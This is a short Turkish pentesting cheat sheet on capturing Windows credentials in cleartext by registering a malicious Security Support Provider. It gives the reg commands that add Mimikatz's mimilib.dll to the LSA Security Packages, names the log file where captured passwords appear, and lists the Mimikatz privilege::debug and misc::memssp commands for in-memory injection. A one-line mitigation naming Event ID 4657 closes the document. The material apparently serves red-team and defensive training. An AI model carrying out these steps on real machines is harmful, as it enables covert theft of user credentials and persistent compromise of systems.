Özel SSP

SSP'nin (Güvenlik Destek Sağlayıcısı) ne olduğunu öğrenin. Makineye erişmek için kullanılan kimlik bilgilerini açık metin olarak yakalamak için kendi SSP'nizi oluşturabilirsiniz.

Mimilib

Mimikatz tarafından sağlanan mimilib.dll ikili dosyasını kullanabilirsiniz. Bu, tüm kimlik bilgilerini açık metin olarak bir dosyaya kaydeder. Dll'yi C:\Windows\System32\ dizinine bırakın Mevcut LSA Güvenlik Paketlerinin listesini alın:

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

Güvenlik Destek Sağlayıcı listesine (Security Packages) mimilib.dll dosyasını ekleyin:

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

Ve yeniden başlatma sonrasında tüm kimlik bilgileri açık metin olarak C:\Windows\System32\kiwissp.log dosyasında bulunabilir.

Bellekte

Ayrıca bunu doğrudan belleğe Mimikatz kullanarak enjekte edebilirsiniz (dikkat edin, biraz kararsız/çalışmayabilir):

privilege::debug
misc::memssp

Bu yeniden başlatmaları sağlamaz.

Hafifletme

Olay Kimliği 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages oluşturulması/değiştirilmesi denetimi